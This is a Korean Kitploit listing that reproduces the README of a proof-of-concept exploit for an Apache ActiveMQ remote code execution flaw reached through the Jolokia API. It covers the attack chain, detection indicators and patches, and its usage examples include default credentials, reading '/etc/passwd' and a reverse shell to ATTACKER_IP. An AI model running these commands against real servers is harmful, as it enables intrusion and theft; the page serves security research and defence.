Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-34197 — # CVE-2026-34197 개념 증명 익스플로잇 Jolokia API를 통한 Apache ActiveMQ의 RCE 취약점인 CVE-2026-34197에 대한 개념 증명 익스플로잇입니다. Python 익스플로잇, 페이로드 템플릿, 테스트 및 연구용 Docker 랩이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/devsecurityspro/cve-2026-34197
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed TeamingLabs & Practice
GitHubdevsecurityspro/cve-2026-34197

CVE-2026-34197

# CVE-2026-34197 개념 증명 익스플로잇 Jolokia API를 통한 Apache ActiveMQ의 RCE 취약점인 CVE-2026-34197에 대한 개념 증명 익스플로잇입니다. Python 익스플로잇, 페이로드 템플릿, 테스트 및 연구용 Docker 랩이 포함되어 있습니다.

저장소 보기
44개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-34197 — Apache ActiveMQ RCE via Jolokia API

설명

CVE-2026-34197은 Apache ActiveMQ Classic의 원격 코드 실행(RCE) 취약점으로, 공격자가 웹 콘솔에 노출된 Jolokia API를 통해 서버 운영 체제에서 임의의 명령을 실행할 수 있게 합니다.

이 취약점은 13년 이상 존재해 왔으며, 여러 구성 요소 간의 상호 작용에서 발생합니다: Jolokia(HTTP-JMX 브리지), ActiveMQ MBeans, 네트워크 커넥터 및 VM 전송.

취약점 정보

필드세부 정보
CVE IDCVE-2026-34197
유형RCE (원격 코드 실행)
CWECWE-20 (잘못된 입력 검증), CWE-94 (코드 주입)
영향을 받는 버전ActiveMQ Classic < 5.19.4, 6.0.0 — 6.2.2
패치된 버전5.19.4, 6.2.3
인증 필요예 (기본 자격 증명 admin:admin 흔함)
인증 불필요 버전6.0.0 — 6.1.1 (CVE-2024-32114로 인해)
기본 포트8161 (웹 콘솔)

공격 메커니즘

공격 체인은 다음과 같이 동작합니다:

  1. 공격자는 /api/jolokia/에 POST 요청을 보내 브로커 MBean의 addNetworkConnector 작업을 호출합니다.
  2. 인수에는 존재하지 않는 브로커를 참조하는 vm:// 전송 URI가 포함됩니다.
  3. ActiveMQ는 해당 브로커를 즉석에서 생성하려 시도하고 원격 URL을 가리키는 brokerConfig 매개변수를 수락합니다.
  4. xbean: 스키마는 리소스가 Spring XML 구성 파일임을 나타냅니다.
  5. Spring은 XML에 정의된 모든 빈을 인스턴스화하며, 여기에는 Runtime.getRuntime().exec()를 실행하는 빈도 포함됩니다.
  6. 서버에서 임의의 명령이 실행됩니다.
root@kitploit:~
공격자                          ActiveMQ (피해자)
   |                                    |
   |-- POST /api/jolokia/ ------------>|
   |   addNetworkConnector(            |
   |     vm://rce?brokerConfig=        |
   |     xbean:http://ATTACKER/x.xml)  |
   |                                    |
   |                                    |-- VM 브로커 생성
   |                                    |-- x.xml 다운로드
   |<-- GET /x.xml --------------------|
   |-- XML 페이로드로 응답 ----------->|
   |                                    |-- Spring 빈 인스턴스화
   |                                    |-- Runtime.exec(COMMAND)
   |                                    |

프로젝트 구조

root@kitploit:~
CVE-2026-34197/
├── README.md              # 이 파일
├── exploit.py             # 주요 PoC
├── payloads/
│   └── template.xml       # Spring XML 페이로드 템플릿
├── docker/
│   └── docker-compose.yml # 취약한 실험실 환경
└── LICENSE

요구 사항

  • Python 3.8+
  • 모듈: requests, http.server, argparse (표준 라이브러리)
  • 대상의 8161 포트에 대한 네트워크 접근
  • Docker 및 Docker Compose (선택 사항, 실험실용)
root@kitploit:~
pip install requests

사용법

1. 취약한 환경 구동 (선택 사항)

root@kitploit:~
cd docker
docker-compose up -d

이 명령은 localhost:8161에서 취약한 ActiveMQ Classic 5.18.6을 실행합니다.

2. 익스플로잇 실행

root@kitploit:~
# 기본 자격 증명을 사용한 기본 사용법
python exploit.py -t http://TARGET:8161 -l ATTACKER_IP -c "id"

# 자격 증명 지정
python exploit.py -t http://TARGET:8161 -l ATTACKER_IP -c "whoami" -u admin -p admin

# 페이로드 HTTP 서버 포트 지정
python exploit.py -t http://TARGET:8161 -l ATTACKER_IP -lp 9999 -c "cat /etc/passwd"

# 인증 없음 모드 (ActiveMQ 6.0.0 - 6.1.1)
python exploit.py -t http://TARGET:8161 -l ATTACKER_IP -c "id" --no-auth

# 리버스 셸
python exploit.py -t http://TARGET:8161 -l ATTACKER_IP -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

매개변수

매개변수설명
-t, --target대상의 기본 URL (예: http://10.0.0.1:8161)
-l, --lhostXML 페이로드를 제공할 공격자 IP
-lp, --lport로컬 HTTP 서버 포트 (기본값: 8888)
-c, --command대상에서 실행할 명령
-u, --user사용자 (기본값: admin)
-p, --password비밀번호 (기본값: admin)
--no-auth자격 증명을 보내지 않음 (6.0.0 - 6.1.1 버전용)
--broker-name브로커 이름 (기본값: localhost)

탐지

ActiveMQ 브로커 로그의 지표:

root@kitploit:~
INFO  | Establishing network connection from vm://localhost to vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml
WARN  | Could not connect to remote URI: vm://rce?create=true&brokerConfig=xbean:http://X.X.X.X:8888/payload.xml

기타 지표:

  • 본문에 addNetworkConnector가 포함된 /api/jolokia/에 대한 POST 요청
  • ActiveMQ 프로세스에서 예상치 못한 호스트로의 나가는 HTTP 연결
  • ActiveMQ Java 프로세스에서 생성된 예상치 못한 자식 프로세스

해결 방법

  • ActiveMQ Classic 5.19.4 또는 6.2.3으로 업데이트
  • 웹 콘솔의 기본 자격 증명 변경
  • 8161 포트에 대한 네트워크 접근 제한
  • brokerConfig=xbean:http가 포함된 vm:// URI가 있는지 브로커 로그 모니터링

참고 자료

  • NVD — CVE-2026-34197
  • Horizon3 — 기술 분석
  • Apache ActiveMQ — 보안 공지
  • CVE-2024-32114 — 인증 없는 Jolokia
  • CVE-2023-46604 — OpenWire RCE (CISA KEV)

작성자

KONDOR DEV SECURITY 제작

Telegram

법적 고지

이 PoC는 교육 및 보안 연구 목적으로만 제공됩니다. 명시적 승인 없이 시스템에 이 도구를 사용하는 것은 불법입니다. 작성자는 이 도구의 오용에 대해 책임을 지지 않습니다.

라이선스

MIT — Copyright (c) 2026 KONDOR DEV SECURITY

도구 다운로드